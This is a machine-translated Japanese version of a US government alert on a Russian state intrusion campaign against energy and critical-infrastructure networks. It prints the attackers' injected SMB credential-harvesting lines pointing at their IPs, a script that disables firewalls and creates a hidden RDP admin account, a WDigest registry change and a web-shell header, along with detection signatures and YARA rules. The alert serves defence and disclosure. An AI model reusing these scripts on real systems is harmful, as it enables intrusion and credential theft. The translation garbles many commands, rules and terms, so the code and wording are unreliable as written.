エネルギーおよびその他の重要インフラ部門を対象としたロシア政府のサイバー活動
ICS-CERTからUS-CERTに伝達されたものです。
スタックスネットのような単一のトロイの木馬型マルウェアではなく、ほぼAIの挙動です。
これからのマルウェアやセキュリティ上の脅威は、サイバー・キル・チェーン・モデルで対処するしかありませんね。
影響を受けるシステム
ドメインコントローラ
ファイルサーバー
メールサーバー
概要
この合同テクニカルアラート(TA)は、国土安全保障省(DHS)と連邦捜査局(FBI)の間の分析的努力の結果です。このアラートでは、エネルギー、原子力、商業施設、水、航空、重要な製造業部門の組織だけでなく、米国政府機関を対象とするロシア政府の行動に関する情報を提供しています。また、妥協点(IOC)の指標と、被害ネットワークに侵入したロシア政府のサイバー犯罪者が使用する戦術、技術、手順(TTP)に関する技術的な詳細も含まれています。DHSとFBIは、ネットワーク警備員に悪意のある活動への暴露を特定し、軽減する能力を高めるよう、このアラートを発しました。
DHSとFBIは、小規模な商業施設のネットワークを標的としたロシア政府のサイバー犯罪者によるマルチステージ侵入キャンペーンとして、マルウェア対策、スピアフィッシング、エネルギー分野ネットワークへの遠隔アクセスを行ったこの活動を特徴づけている。アクセスを得た後、ロシアの政府のサイバー俳優は、ネットワーク偵察を行い、横方向に移動し、産業制御システム(ICS)に関する情報を収集した。
IOCパッケージおよび関連ファイルのダウンロード可能なコピーについては、以下を参照してください。
TA18-074A_TLP_WHITE.csv
TA18-074A_TLP_WHITE.stix.xml
MIFR-10127623_TLP_WHITE.pdf
MIFR-10127623_TLP_WHITE_stix.xml
MIFR-10128327_TLP_WHITE.pdf
MIFR-10128327_TLP_WHITE_stix.xml
MIFR-10128336_TLP_WHITE.pdf
MIFR-10128336_TLP_WHITE_stix.xml
MIFR-10128830_TLP_WHITE.pdf
MIFR-10128830_TLP_WHITE_stix.xml
MIFR-10128883_TLP_WHITE.pdf
MIFR-10128883_TLP_WHITE_stix.xml
MIFR-10135300_TLP_WHITE.pdf
MIFR-10135300_TLP_WHITE_stix.xml
直ちにDHSまたは法執行機関に連絡して、侵入を報告し、インシデント対応リソースまたは技術援助を要請する。
説明
2016年3月以降、ロシア政府のサイバー犯罪者(以下、「脅威俳優」と呼ぶ)は、エネルギー、原子力、商業施設、水道、航空宇宙、重要な製造業など、
DHSとFBIによる分析の結果、この活動に関連する明確な指標と行動が特定された。注目すべきは、2017年9月6日にシマンテックがリリースした洗練された攻撃グループを対象としたDragonfly:Western energy部門のレポートで、この進行中のキャンペーンに関する追加情報が記載されています。[1] (リンクは外部)
このキャンペーンには、ステージングと意図したターゲットという2つの異なるカテゴリの犠牲者が含まれています。最初の犠牲者は、このアラートを通じて「ステージングターゲット」と呼ばれる、セキュリティの弱いネットワークを持つ信頼できる第三者サプライヤなどの周辺組織です。脅威の俳優たちは、最終的に意図した犠牲者を標的とするときに、ステージング対象のネットワークをピボットポイントやマルウェアリポジトリとして使用しました。NCCICとFBIの判断では、俳優の究極の目的は組織ネットワークを妥協することであり、「意図した目標」とも呼ばれている。
技術的な詳細
このキャンペーンの脅威主体は、さまざまなTTPを使用しました。
スピアフィッシングメール(不正使用された正当なアカウントから)
水分補給ドメイン、
資格情報の収集、
オープンソースとネットワーク偵察、
ホストベースの搾取、および
産業制御システム(ICS)インフラを対象としています。
分析にサイバーキルチェインを使用する
DHSは、ロッキード・マーチン・サイバー・キル・チェーン・モデルを使用して、悪意のあるサイバー活動を分析し、議論し、解剖しました。このモデルの段階には、偵察、武器化、配達、搾取、設置、指揮統制、目的に関する行動などが含まれます。このセクションでは、このフレームワーク内の脅威アクターの活動の概要を説明します。
ステージ1:偵察
脅威主体は、機会のターゲットとして追求するのではなく、意図した組織を意図的に選択したように見えます。ステージングターゲットは、多くの意図されたターゲットと既存の関係を保持していました。DHS分析では、脅威アクターが、偵察段階で組織監視ネットワークが主催する公開情報にアクセスすることが確認されました。フォレンジック分析に基づいて、DHSは脅威の俳優が組織内のネットワークおよび組織設計および制御システム機能に関する情報を求めたことを評価します。これらの手法は、対象となる槍フィッシングの試みに必要な情報を収集するために一般的に使用されます。場合によっては、会社のウェブサイトに投稿された情報、特に無害である可能性がある情報には、機密情報が含まれている場合があります。一例として、脅威の俳優は、公にアクセス可能な人事ページから小さな写真をダウンロードしました。拡張された画像は、制御システムの機器モデルとステータス情報をバックグラウンドで表示する高解像度の写真でした。
また分析では、脅威の俳優たちは、いくつかの意図されたターゲットのウェブサイトのソースコードをダウンロードするために妥協したステージングターゲットを使用したことも明らかにしました。さらに、脅威アクターは、企業のWebベースの電子メールや仮想プライベートネットワーク(VPN)接続などのインフラストラクチャにリモートからアクセスしようとしました。
Sの田下2:兵器
スピアフィッシングEメールTTP
スピアフィッシングキャンペーンでは、電子メール添付ファイルを使用して、正当なMicrosoft Office機能を活用して、サーバーメッセージブロック(SMB)プロトコルを使用してリモートサーバーからドキュメントを取得しました。(この要求の例はfile [:] // <リモートIPアドレス> /Normal.dotmです)。Microsoft Wordによって実行される標準プロセスの一部として、この要求はサーバーでクライアントを認証し、要求されたファイルを取得する前にユーザーの資格情報ハッシュをリモートサーバーに送信します。(注:ファイルが取得されなくても資格情報の転送が行われる可能性があります)。資格情報ハッシュを取得した後、脅威アクターはパスワードクラッキング技術を使用して平文パスワードを取得できます。有効な資格情報を使用すると、脅威アクターは、単一要素認証を使用する環境で許可されたユーザーになりすますことができます。[2]
水穴地域の利用
脅威俳優の目標を立てるための主な用途の1つは、雨水穴を開けることでした。脅威主体は、信頼できる組織のインフラストラクチャを傷つけ、意図した目標を達成しました。[3]既知の給水口のおよそ半分は、プロセス制御、ICS、または重要インフラに関連する商業出版物および情報ウェブサイトである。これらの水穴は評判の良い組織によって開発された正当なコンテンツをホストしているかもしれませんが、脅威アクターはウェブサイトを改変して悪意のあるコンテンツを含むようにしました。脅威の俳優は、ウェブサイトのコンテンツにアクセスしてそれを直接変更するために合法的な資格情報を使用しました。脅威アクターは、脅威アクターによって制御されるIPアドレスからSMBを使用してファイルアイコンを要求するようにJavaScriptおよびPHPファイルを変更することにより、これらのWebサイトを修正しました。この要求は、資格取得のために槍フィッシング詐欺の文書で観察された同様の技術を達成する。あるケースでは、脅威アクターは、リダイレクトされたトラフィックを実行した正当なPHPファイル "header.php"にコード行を追加しました。
<img src = "file [:] // 62.8.193 [。] 206 / main_logo.png" style = "height:1px; width:1px;" />
別の例では、脅威の俳優は、ユーザーのブラウザのさまざまな側面を検出するためにウェブサイトが使用する正当なJavaScriptライブラリである "modernizr.js"というJavaScriptファイルを変更しました。ファイルは以下の内容を含むように変更されました:
var i = document.createElement( "img");
i.src = "file [:] // 184.154.150 [。] 66 / ame_icon.png";
i.width = 3;
i.height = 2;
ステージ3:配達
ステージング対象のネットワークを脅かすと、脅威主体は以前に報告されたTTPとは異なるスピアフィッシング電子メールを使用しました。スピアフィッシングの電子メールは、総称契約約款(件名は「AGREEMENT&Confidential」)を使用し、「document.pdf」という一般的なPDF文書が含まれていました。(添付ファイル名の冒頭に2つの単一のバックティックを含めることに注意してください)。PDFは悪意のあるコードではなく、アクティブなコードを含んでいませんでした。この文書には短縮URLが含まれていたため、クリックすると、ユーザーに電子メールアドレスとパスワードの入力を求めるWebサイトが表示されました。(注:PDF内のコードはダウンロードを開始しませんでした。)
以前の報告では、DHSとFBIは、これらのスピアフィッシング電子メールのすべてが制御システムまたはプロセス制御システムに言及していることに気づいた。脅威の俳優たちは、意図した標的組織に対してこれらのテーマを特に使用し続けました。電子メールメッセージには、一般的な産業用制御装置およびプロトコルへの参照が含まれていました。この電子メールは、産業制御システム担当者の正式な履歴書またはCV(カリキュラムビタ)と思われる悪意のあるMicrosoft Word添付ファイル、およびユーザーに添付ファイルを開くよう促す招待状とポリシー文書を使用していました。
ステージ4:搾取
脅威の俳優たちは、フィッシング詐欺行為において、ステージング対象に向けられた、独特で珍しいTTPを使用しました。http:// imageliners [。] comの最終的な宛先にリダイレクトされたhttp:// tinyurl [。] com / h3sdqckリンクにリダイレクトされたhttp:// bit [。] ly / 2m0x8IHリンクへの連続的なリダイレクト/ nitel。imagelinerウェブサイトには、ウェブサイトのログインページを模倣する電子メールアドレスとパスワードの入力フィールドが含まれていました。
意図したターゲットを悪用すると、脅威アクターは悪意のある.docxファイルを使用してユーザーの資格情報を取得しました。ドキュメントは、TCP(Transmission Control Protocol)ポート445または139を使用して、SMB上の "file://"接続を介してファイルを取得しました。この接続は、コマンドおよび制御(C2)サーバー(脅威アクターが所有するサーバーまたは被害者のものです。ユーザーがドメインの認証を試みると、C2サーバーにパスワードのハッシュが提供されました。ローカルユーザは、ユーザ名とパスワードを入力するグラフィカルユーザインタフェース(GUI)プロンプトを受信し、C2はTCPポート445または139を介してこの情報を受信しました(注:信用情報の損失にはファイル転送は必要ありません)。この行動をこのキャンペーンのDragonflyの脅威の俳優に関連付けます。[1] (リンクは外部)
ステージ5:インストール
脅威アクターは、妥協した資格情報を利用して、マルチファクタ認証が使用されていない犠牲者のネットワークにアクセスしました。[4]永続性を維持するために、脅威アクターは、ステージング対象内にローカル管理者アカウントを作成し、意図したターゲット内に悪意のあるファイルを配置しました。
ローカルアカウントの確立
脅威の俳優たちは、正規のバックアップアカウントに偽装されたローカル管理者アカウントを作成するためにスクリプトを使用しました。最初のスクリプト "symantec_help.jsp"には、ローカル管理者アカウントを作成し、リモートアクセス用のファイアウォールを操作するために設計された悪質なスクリプトへの1行の参照が含まれていました。このスクリプトは "C:¥Program Files(x86)¥Symantec¥Symantec Endpoint Protection Manager¥tomcat¥webapps¥ROOT¥"にあります。
symantec_help.jspの内容
____________________________________________________________________________________________
<%Runtime.getRuntime()。exec( "cmd / C \" "+ System.getProperty(" user.dir ")+" \\ .. \\ webapps \\ ROOT \\ <enu.cmd> \ "" ); %>
____________________________________________________________________________________________
スクリプト "enu.cmd"は、管理者アカウントを作成し、ホストベースのファイアウォールを無効にし、リモートデスクトッププロトコル(RDP)アクセス用にグローバルにポート3389を開きました。スクリプトは次に、新しく作成したアカウントを管理者グループに追加して昇格された権限を取得しようとしました。このスクリプトには、スペイン語、イタリア語、ドイツ語、フランス語、および英語のグループ名 "administrator"のハードコード値が含まれていました。
enu.cmdの内容
____________________________________________________________________________________________
netshファイアウォールがopmodeを無効にする
netsh advfirewallはすべてのプロファイルをオフに設定します
TCP / t REG_SZ / d "3389:TCP:*:Enabled:リモートデスクトップ" / f:リモートデスクトップ "/ f。
TCP / t REG_SZ / d "3389:TCP:*:Enabled:リモートデスクトップ" / f:リモートデスクトップ "/ f。
reg "HKLM \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server" / v fDenyTSConnections / t REG_DWORD / d 0 / fを追加します
reg "HKLM \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server" / v fSingleSessionPerUser / t REG_DWORD / d 0 / fを追加します
reg "HKLM¥SYSTEM¥CurrentControlSet¥Control¥Terminal Server¥Licensing Core" / v EnableConcurrentSessions / t REG_DWORD / d 1 / fを追加します
regを "HKLM¥SOFTWARE¥Microsoft¥Windows NT¥CurrentVersion¥Winlogon"に追加します。/ v EnableConcurrentSessions / t REG_DWORD / d 1 / f
regは「HKLM¥SOFTWARE¥Microsoft¥Windows NT¥CurrentVersion¥Winlogon」を追加します。/ v AllowMultipleTSSessions / t REG_DWORD / d 1 / f
"HKLM \ SOFTWARE \ Policies \ Microsoft \ Windows NT \ Terminal Services" / v MaxInstanceCount / t REG_DWORD / d 100 / fを追加します。
ネットユーザーMS_BACKUP <Redacted_Password> / add
net localgroup管理者/ MS_BACKUPを追加する
net localgroup管理/追加MS_BACKUP
net localgroup Amministratori / MS_BACKUPを追加します。
net localgroup管理/追加MS_BACKUP
net localgroup Administrateurs / MS_BACKUPを追加する
net localgroup "リモートデスクトップユーザー" / MS_BACKUPを追加する
ネットユーザーMS_BACKUP / expires:never
regは「HKLM¥SOFTWARE¥Microsoft¥Windows NT¥CurrentVersion¥Winlogon¥SpecialAccounts¥UserList」を追加します。/ v MS_BACKUP / t REG_DWORD / d 0 / f
regは、HKLM¥SOFTWARE¥Microsoft¥Windows¥CurrentVersion¥policies¥system / v dontdisplaylastusername / t REG_DWORD / d 1 / fを追加します。
regを追加します。HKLM¥SOFTWARE¥Microsoft¥Windows¥CurrentVersion¥policies¥system / v LocalAccountTokenFilterPolicy / t REG_DWORD / d 1 / f
sc config termservice start = auto
ネット開始用語サービス
____________________________________________________________________________________________
DHSは、脅威の俳優が、このようなスクリプトを使用して、ステージング対象のネットワーク内に複数のアカウントを作成することを観察しました。脅威俳優によって作成された各アカウントは、その運用において特定の目的を果たしました。これらの目的は、追加のアカウントの作成からアクティビティのクリーンアップまでの範囲でした。DHSとFBIは、これらのローカル口座を作成した後、以下の行動を観察した。
アカウント1:アカウント1は、ステージング対象のバックアップサービスを模倣するように名前が付けられました。このアカウントは、前述の悪質なスクリプトによって作成されました。脅威俳優は、このアカウントを使用してオープンソースの偵察を行い、意図した目標に遠隔からアクセスしました。
アカウント2:アカウント1を使用してアカウント2を作成し、電子メール管理アカウントを偽装しました。観察された唯一のアクションは、アカウント3を作成することでした。
アカウント3:ステージング対象のMicrosoft Exchange Server内にアカウント3が作成されました。PowerShellスクリプトは、脅威アクターがアカウント2として認証されている間に、RDPセッション中にこのアカウントを作成しました。作成されたMicrosoft Exchangeアカウントの命名規則に続いてステージングターゲット(たとえば、姓と最初に連結した最初のイニシャル)が続きました。
アカウント4:妥協の後半に、脅威アクターはアカウント1を使用してローカル管理者アカウントであるアカウント4を作成しました。次に、アカウント4を使用してログを削除し、トラックをカバーしました。
スケジュールされたタスク
さらに、脅威アクターは、8時間ごとに新しく作成されたアカウントから自動的にログアウトするように設計されたresetというスケジュールされたタスクを作成しました。
VPNソフトウェア
ステージングターゲットへのアクセスを達成した後、脅威アクターは、意図した犠牲者に対して操作を実行するツールをインストールしました。ある時に、脅威の俳優たちは、意図したターゲットネットワークに接続するためのVPNクライアントとしておそらく使用されていたFortiClientの無料版をインストールしました。
パスワードクラッキングツール
脅威の俳優たちは、信任状収穫の目標と一致して、Hydra、SecretsDump、CrackMapExecなどのオープンソースとフリーツールを削除して実行しました。命名規則とダウンロード場所は、これらのファイルがGitHubのような公に利用可能な場所から直接ダウンロードされたことを示唆しています。フォレンジック分析は、これらのツールの多くが、アクターがシステムにアクセスしていた期間に実行されたことを示しています。注目すべきは、脅威の俳優たちがPython 2.7を犠牲にした病院のホストにインストールしたことと、C:\ Users \ <Redacted Username> \ Desktop \ OWAExchange \にPythonスクリプトがあることです。
ダウンローダ
意図したターゲットのネットワークの内部に入ると、脅威アクターはリモートサーバーからツールをダウンロードしました。ファイル名の最初のバージョンは.txt拡張子を含み、適切な拡張子(通常は.exeまたは.zip)に名前が変更されました。
一例では、意図した犠牲者のネットワークへの遠隔アクセスを得た後、脅威アクターは以下のアクションを実行した:
脅威アクターは91.183.104 [。] 150に接続し、複数のファイル、特にファイルINST.txtをダウンロードしました。
ファイルは新しい拡張子に名前が変更され、INST.txtの名前はINST.exeに変更されました。
ファイルはホスト上で実行され、すぐに削除されました。
INST.exeを実行すると、ntdll.exeがダウンロードされ、ntdll.exeが意図したターゲットの侵害されたシステムの実行プロセスリストに表示されました。
レジストリ値 "ntdll"が "HKEY_USERS \ <USER SID> \ Software \ Microsoft \ Windows \ CurrentVersion \ Run"キーに追加されました。
.LNKファイル操作による永続性
脅威の俳優は、一般にMicrosoft Windowのショートカットファイルと呼ばれるLNKファイルを操作して、ユーザーの資格情報を繰り返し収集しました。デフォルトのWindows機能により、ローカルまたはリモートのWindowsリポジトリからアイコンをロードできます。脅威アクターは、アイコンのパスをアクターがリモートサーバーコントローラーに設定することで、この組み込みのWindows機能を悪用しました。ユーザーがディレクトリを参照すると、Windowsはアイコンを読み込み、SMB認証セッションを開始しようとします。このプロセス中、アクティブなユーザーの資格情報は、試行されたSMB接続を介して渡されます。
観察されたLNKファイルのうち4つは、 "SETROUTE.lnk"、 "notepad.exe.lnk"、 "Document.lnk"および "desktop.ini.lnk"でした。これらの名前は文脈的であるように見え、脅威の俳優はこの戦術を使用している間に様々なファイル名を使用することがあります。これらのLNKファイルのアイコンパスで観察された2つのリモートサーバーは、62.8.193 [206]と5.153.58 [。] 45でした。以下は、LNKファイルの1つの解析された内容です:
LNKファイルの1つの解析された内容
ファイルの解析出力:desktop.ini.lnk
レジストリの変更
脅威アクターは、キーシステムを変更して、プレーンテキストのクレデンシャルをメモリに格納します。ある例では、脅威アクターは次のコマンドを実行しました。
reg "HKLM \ SYSTEM \ CurrentControlSet \ Control \ SecurityProviders \ WDigest" / v UseLogonCredential / t REG_DWORD / d 1 / fを追加します
ステージ6:コマンドとコントロール
脅威の俳優は、一般に、意図したターゲットの公開アクセス可能な電子メールおよびWebサーバー上にWebシェルを作成しました。脅威の俳優は、2つの異なるウェブシェルに対して3つの異なるファイル名( "global.aspx、autodiscover.aspx、index.aspx)を使用しました。2つのグループの違いは、「パブリックストリングパスワード」フィールドでした。
Webシェルの初めの内容
____________________________________________________________________________________________
<%@ Page Language = "C#" Debug = "true" trace = "false" validateRequest = "false" EnableViewStateMac = "false" EnableViewState = "true"%>
<%@ import Namespace = "System"%>
<%@ import Namespace = "System.IO"%>
<%@ import Namespace = "System.Diagnostics"%>
<%@ import Namespace = "System.Data"%>
<%@ import Namespace = "System.Management"%>
<%@ import Namespace = "System.Data.OleDb"%>
<%@ import Namespace = "Microsoft.Win32"%>
<%@ import Namespace = "System.Net.Sockets"%>
<%@ import Namespace = "System.Net"%>
<%@ import Namespace = "System.Runtime.InteropServices"%>
<%@ import Namespace = "System.DirectoryServices"%>
<%@ import Namespace = "System.ServiceProcess"%>
<%@ import Namespace = "System.Text.RegularExpressions"%>
<%@ Import Namespace = "System.Threading"%>
<%@ Import Namespace = "System.Data.SqlClient"%>
<%@ import Namespace = "Microsoft.VisualBasic"%>
<%@ Import Namespace = "System.IO.Compression"%>
<%@ Assembly Name = "System.DirectoryServices、Version = 2.0.0.0、Culture = neutral、PublicKeyToken = B03F5F7F11D50A3A"%>
<%@ Assembly Name = "System.Management、Version = 2.0.0.0、Culture = neutral、PublicKeyToken = B03F5F7F11D50A3A"%>
<%@ Assembly Name = "System.ServiceProcess、Version = 2.0.0.0、Culture =ニュートラル、PublicKeyToken = B03F5F7F11D50A3A"%>
<%@ Assembly Name = "Microsoft.VisualBasic、Version = 7.0.3300.0、Culture =ニュートラル、PublicKeyToken = b03f5f7f11d50a3a"%>
<!DOCTYPE html PUBLIC " - // W3C // DTD XHTML 1.0 Transitional // EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat = "server">
パブリック・ストリングPassword = "<REDACTED>";
パブリック文字列z_progname = "z_WebShell";
...
____________________________________________________________________________________________
ステージ7:目標に対する行動
DHSとFBIは、リモートアクセスサービスとVPN、RDP、OWA(Outlook Web Access)などのインフラストラクチャを活用して、脅威の主体を特定しました。脅威の俳優は、複数の意図されたターゲットに接続するためにステージングターゲットのインフラストラクチャを使用しました。
内部偵察
意図した犠牲者へのアクセスを得ると、脅威アクターはネットワーク内で偵察操作を実施した。DHSは、被害者のネットワーク内のファイルサーバーの特定と参照に焦点を当てた脅威の俳優を観察しました。
標的のネットワーク上にいったん到達すると、脅威アクターは、RDPを介して被害者のドメインコントローラにアクセスするために特権のある資格情報を使用しました。一度ドメインコントローラを操作すると、脅威アクターはバッチスクリプト「dc.bat」と「dit.bat」を使用して、ホスト、ユーザー、および環境に関する追加情報を列挙しました。これらのスクリプトから観察された出力(テキスト文書)は次のとおりです。
admins.txt
completed_dclist.txt
completed_trusts.txt
completed_zone.txt
comps.txt
conditional_forwarders.txt
domain_zone.txt
enum_zones.txt
users.txt
脅威の俳優たちは、ファイル "ntds.dit"と "SYSTEM"レジストリハイブも収集しました。DHSは、脅威アクターがこれらのファイルをすべて "SYSTEM.zip"と "comps.zip"という名前のアーカイブに圧縮していることを確認しました。
脅威の俳優たちは、Windowsのスケジュールされたタスクとバッチスクリプトを使って "scr.exe"を実行し、ネットワーク上のホストから追加情報を収集しました。ツール "scr.exe"は、脅威アクタがネットワーク上のシステムの画面をキャプチャするために使用したスクリーンショットユーティリティです。SymantecのDragonfly 2.0レポートで報告されているように、 "scr.exe"のMD5ハッシュがScreenUtilのMD5と一致しました。
少なくとも2つの例では、脅威アクターは、PsExecツールを実行するために、「pss.bat」および「psc.bat」というラベルのバッチスクリプトを使用しました。さらに、脅威の俳優はツールPsExecの名前を "ps.exe"に変更します。
バッチスクリプト( "pss.bat"または "psc.bat")は、ドメイン管理者の資格情報で実行されます。
ディレクトリ "out"は、ユーザーの%AppData%フォルダに作成されます。
PsExecは、ネットワーク上で "scr.exe"を実行し、 "ip.txt"でシステムのスクリーンショットを収集するために使用されます。
スクリーンショットのファイル名は、ホストのコンピュータ名に基づいてラベル付けされ、ターゲットのC:\ Windows \ Tempディレクトリに ".jpg"拡張子で保存されます。
スクリーンショットは、バッチスクリプトが実行されたシステムの新しく作成された「out」ディレクトリにコピーされます。
ある例では、DHSは「out.zip」ファイルを作成したことを確認しました。
DHSは脅威主体がホスト情報のリストを含んでいたと考えられる "ip.txt"と名付けられたテキスト文書を作成し、変更することを観察した。脅威の俳優は、ホストのソースとして "ip.txt"を使用して追加の偵察活動を行った。さらに、バッチスクリプトが実行された結果、テキスト文書「res.txt」および「err.txt」が作成されていることが確認されました。ある例では、 "res.txt"には、Windowsのコマンド "query user"の出力がネットワーク経由で格納されていました。
<Username>の使用<Password>
<Hostname1>で
-s cmd / c query userを
実行する-s cmd / c <
hostname2 >でquery userを実行する-s cmd / c < hostname3 >でユーザーに問い合せるUSERNAME SESSIONNAME ID状態IDLE TIME LOGON TIME
<user1> 2ディスク1 + 19:34 6/27/2017 12:35 PM
"dirsb.bat"という追加のバッチスクリプトを使用して、ネットワーク上のホストからフォルダとファイル名を収集しました。
脅威の俳優は、バッチスクリプトに加えて、「scr.exe」でスクリーンショットを収集するためにスケジュールされたタスクを使用しました。2つのインスタンスでは、スケジュールされたタスクは、引数 "C:\ Windows \ Temp \ scr.jpg"を使用してコマンド "C:\ Windows \ Temp \ scr.exe"を実行するように設計されています。別の例では、スケジュールされたタスクは、ローカル管理者の "AppData \ Local \ Microsoft \"フォルダーから引数 "pss.bat"で実行するように設計されています。
脅威アクターは一般に、ユーザーのAppDataまたはDownloadsフォルダ内のさまざまなディレクトリからファイルを実行します。いくつかの一般的なディレクトリ名は
Chromex64、
マイクロソフト、
NT、
Office365、
温度、および
更新。
ICSおよびSCADAインフラストラクチャのターゲット設定
複数のケースでは、脅威アクターは、エネルギー発電施設内の制御システムからのデータ出力を含む企業ネットワーク上のワークステーションおよびサーバーにアクセスしました。脅威アクターは、ICSまたは監視制御およびデータ収集(SCADA)システムに関するファイルにアクセスしました。既存の妥協案のDHS分析に基づいて、これらのファイルには、組織に関するICSベンダー名とICS参照文書(「SCADA WIRING DIAGRAM.pdf」または「SCADA PANEL LAYOUTS.xlsx」など)を含む名前が付けられました。
脅威アクターは、ネットワーク上のICSシステムにアクセスするためのプロファイルと構成情報を対象とし、コピーしました。DHSは、ICSシステムへのアクセスに関する構成情報を含む仮想ネットワーク接続(VNC)プロファイルをコピーする脅威アクターを観察しました。DHSは、脅威アクターがアクセスしたHuman Machine Interface(HMI)のスクリーンショット断片を再構成することができました。
この画像は、脅威アクターによってアクセスされたヒューマンマシンインタフェース(HMI)システムの再構成されたスクリーンショットを示しています。 この画像は、脅威俳優の産業制御システム(ICS)環境への関心と関心を示しています。
クリーンアップとカバートラック
複数のインスタンスでは、脅威アクターはステージングターゲット上にクリーンアップ操作を実行するための新しいアカウントを作成しました。作成されたアカウントは、システム、セキュリティ、ターミナルサービス、リモートサービス、および監査の各Windowsイベントログをクリアするために使用されました。脅威の俳優たちは、インストールされたアプリケーションを、ログに記録されているログとともにネットワークに入れたまま削除しました。たとえば、1つの商業施設にインストールされたFortinetクライアントは、使用されたログとともに削除されました。最後に、アクセスされたシステムで使用されている他のアカウントによって生成されたデータが削除されました。
脅威アクターは、作成されたスクリーンショットと特定のレジストリキーを削除することで、意図したターゲットネットワークを駆除しました。法医学分析を通じて、DHSは、脅威主体が、リモートシステムへの接続を追跡するターミナルサーバークライアントに関連するレジストリキーを削除したと判断しました。脅威の俳優たちは、バッチスクリプト、出力テキスト文書、および「scr.exe」のような環境に持ち込まれたツールをすべて削除しました。
検出と応答
このキャンペーンに関連するIOCは、このアラートの付随する.csvファイルおよび.stixファイル内で提供されます。DHSとFBIは、ネットワーク管理者がIPアドレス、ドメイン名、ファイルハッシュ、ネットワークシグネチャ、およびYARAルールを確認し、それらのウォッチリストにIPを追加して悪意のある活動が組織内で観察されているかどうかを判断することを推奨します。システム所有者は、これらの脅威俳優のターゲットに絞られている疑いのあるシステムでYARAツールを実行することも勧められます。
ネットワーク署名とホストベースのルール
このセクションには、脅威アクターのTTPに関連付けられた悪質なアクティビティを検出するために使用できるネットワークシグニチャとホストベースのルールが含まれています。これらのネットワークシグニチャとホストベースのルールは、包括的な検証プロセスを使用して作成されましたが、誤検出の可能性は常に残っています。
ネットワーク署名
(HTTP URIに '/ aspnet_client / system_web / 4_0_30319 / update /'(ビーコン)が含まれています); sid:42000000; rev:1;フロー:確立済み、to_server;内容: "/ aspnet_client / system_web / 4_0_30319 / update /"; http_uri; fast_pattern:のみ; classtype:不良 - 不明;メタデータ:サービスhttp;)
___________________________________
(HTTP URIに '/img/bson021.dat'が含まれています); sid:42000001; rev:1;フロー:確立済み、to_server;コンテンツ: "/ img / bson021。 dat; http_uri; fast_pattern:唯一; classtype:不良 - 不明;メタデータ:サービスhttp;)
________________________________________
(HTTP URIに '/ A56WY'(コールバック)が含まれています); sid:42000002; rev:1;フロー:確立済み、to_server;コンテンツ: "/ A56WY"; http_uri; fast_pattern; classtype:不良 - 不明;メタデータ:サービスhttp;)
_________________________________________
(SMBクライアント要求には 'AME_ICON.PNG'(SMB資格取得)が含まれています); sid:42000003; rev:1;フロー:確立済み、to_server;内容: "| FF | SMB | 7500 00 00 00 | ";オフセット:4;深さ:9;内容:" | 08 00 01 00 | ";距離:3;内容:" | 00 5c 5c | ";距離:2;内:3;内容: "| 5c | AME_ICON.PNG";距離:7; fast_pattern; classtype:不良 - 不明;メタデータ:service netbios-ssn;)
________________________________________
(sMB資格取得) "; sid:42000004; rev:1;フロー:確立済み、to_server;内容:" / tcp_HOME / tcp $ HOME_NET any-> $ EXTERNAL_NET $ HTTP_PORTS(msg: "HTTP URIオプションには '/ame_icon.png' "オプション"; nocase; http_method; classtype:悪意のある不明;メタデータ:サービスhttp;); http_uri; fast_pattern:
_________________________________________
HTTPクライアントヘッダーには 'User-Agent | 3a 20 | Go-http-client / 1.1' "が含まれています; sid:42000005; rev:1;フロー:established、to_server ; content: "User-Agent | 3a 20 | Go-http-client / 1.1 | 0d 0a | Accept-Encoding | 3a 20 | gzip"; http_header; fast_pattern:pcre: "/ \。(?: aspx | txt )?[a-z0-9] {3} = [a-z0-9] {32}&/ U "; classtype:不良 - 不明;メタデータ:サービスhttp;)
__________________________________________
$ HOME_NET any(msg: "SMBサーバートラフィックにはNTLM認証SMBv1セッションが含まれています"; sid:42000006; rev:1;フロー:確立済み、to_client;内容: "| ff 53 4d 42 72 00:00 00 00 80 | "; fast_pattern:のみ;内容:" | 05 00 | ";距離:23; classtype:不良 - 不明;メタデータ:サービスnetbios-ssn;)
YARAルール
これは、このアクティビティに関連付けられたマルウェアの統合ルールセットです。これらのルールはNCCICによって作成され、信頼できるパートナーからの寄付が含まれています。
* /
ルールAPT_malware_1
{
メタ:
description = "inveighペンテストツールと関連する成果物"
著者= "DHS | NCCICコード分析チーム"
date = "2017/07/17"
hash0 = "61C909D2F625223DB2FB858BBDF42A76"
hash1 = "A07AA521E7CAFB360294E56969EDA5D6"
hash2 = "BA756DD64C1147515BA2298B6A760260"
hash3 = "8943E71A8C73B5E343AA9D2E19002373"
hash4 = "04738CA02F59A5CD394998A99FCD9613"
hash5 = "038A97B4E2F37F34B255F0643E49FC9D"
hash6 = "65A1A73253F04354886F375B59550B46"
hash7 = "AA905A3508D9309A93AD5C0EC26EBC9B"
hash8 = "5DBEF7BDDAF50624E840CCBCE2816594"
hash9 = "722154A36F32BA10E98020A8AD758A7A"
hash10 = "4595DBE00A538DF127E0079294C87DA0"
文字列:
$ s0 = "file://"
$ s1 = "/ame_icon.png"
$ s2 = "184.154.150.66"
$ s3 = {87D081F60C67F5086A003315D49A4000F7D6E8EB12000081F7F01BDD21F7DE}
$ s4 = {33C42BCB333DC0AD400043C1C61A33C3F7DE33F042C705B5AC400026AF2102}
$ s5 = "(g.charCodeAt(c)^ l [(l [b] + l [e])%256])"
$ s6 = "for(b = 0; 256> b; b ++)k [b] = b; for(b = 0; 256> b; b ++)"
$ s7 = "VXNESWJfSjY3grKEkEkRuZeSvkE ="
$ s8 = "NlZzSZk ="
$ s9 = "WlJTb1q5kaxqZaRnser3sw =="
$ s10 = "for(b = 0; 256> b; b ++)k [b] = b; for(b = 0; 256> b; b ++)"
$ s11 = "fromCharCode(d.charCodeAt(e)^ k [(k [b] + k [h])%256])"
$ s12 = "ps.exe -accepteula \\%ws%-u%ユーザー%-p%パス%-s cmd / c netstat"
$ s13 = {22546F6B656E733D312064656C696D733D5C5C222025254920494E20286C6973742E74787429}
$ s14 = {68656C6C2E657865202D6E6F65786974202D657865637574696F6E706F6C69637920627970617373202D636F6D6D616E6420222E202E5C496E76656967682E70}
$ s15 = {476F206275696C642049443A202266626433373937623163313465306531}
//積極的なペンテストツール
$ s16 = {24696E76656967682E7374617475735F71756575652E4164642822507265737320616E79206B657920746F2073746F70207265616C2074696D65}
//特定の悪意のある単語の文書PKアーカイブ
